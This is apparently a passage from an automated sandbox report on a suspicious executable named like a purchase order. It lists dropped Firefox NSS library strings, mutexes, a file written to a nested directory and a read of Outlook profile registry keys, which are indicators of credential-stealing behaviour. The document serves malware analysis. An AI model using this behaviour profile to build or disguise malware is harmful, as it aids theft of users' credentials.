                    Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                    Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                    Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.drBinary or memory string: SELECT ALL id FROM %s;
                    Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                    Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                    Source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.5.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.5.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.5.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.5.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
                    Source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.5.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3384:120:WilError_03
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeMutant created: \Sessions\1\BaseNamedObjects\AB1F56922-9414907A-A61E15EF-E1A93A45-640FB406
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3384:304:WilStaging_02
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeFile written: C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Afskede\Hitherunto\Sale\Swedish.iniJump to behavior
                    Source: C:\Users\user\Desktop\PO No. 3200005919.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                    Source: PO No. 3200005919.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7160196459.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197174638.000000001E688000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7197871193.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197956244.000000001E6B4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7164106750.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197668078.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197360510.000000001E698000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7164222655.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.5.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.5.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: PO No. 3200005919.exe, 00000005.00000003.7177302038.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7180029711.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.5.dr
                    Source: Binary string: ucrtbase.pdb source: PO No. 3200005919.exe, 00000005.00000003.7214861281.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7186840993.000000001E6C0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7189033393.0000000000060000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.5.dr
                    Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7192477101.000000001E5F8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192708827.000000001E600000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192605806.000000001E5FC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192063322.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192298891.000000001E5F4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7139684497.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7193344870.000000001E61C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192860880.000000001E610000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193449641.000000001E620000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193081967.000000001E614000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7145957838.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193561822.000000001E624000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193218179.000000001E618000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.5.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.5.dr
                    Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192063322.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192298891.000000001E5F4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7155669494.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196318925.000000001E658000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195985940.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7154557567.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196171931.000000001E654000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7196731869.000000001E670000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7159539905.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196892223.000000001E674000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197003158.000000001E678000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7164222655.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7165324032.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7192860880.000000001E610000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193081967.000000001E614000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7144272032.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196318925.000000001E658000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195985940.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196442274.000000001E65C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7156953736.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196171931.000000001E654000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196550840.000000001E660000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7153506909.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195985940.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7152463127.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.5.dr
                    Source: Binary string: vcruntime140.i386.pdbGCTL source: PO No. 3200005919.exe, 00000005.00000003.7191720901.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7216382572.000000001DC98000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.5.dr
                    Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7196731869.000000001E670000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196892223.000000001E674000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.5.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201066945.000000001D980000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172137254.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7172491492.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.5.dr
                    Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7192477101.000000001E5F8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192063322.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192298891.000000001E5F4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7138655949.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.5.dr
                    Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7150187588.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.5.dr
                    Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170103702.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7170941292.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7200410147.000000001D92C000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.5.dr
                    Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000002.7280858464.000000001E270000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.5.dr
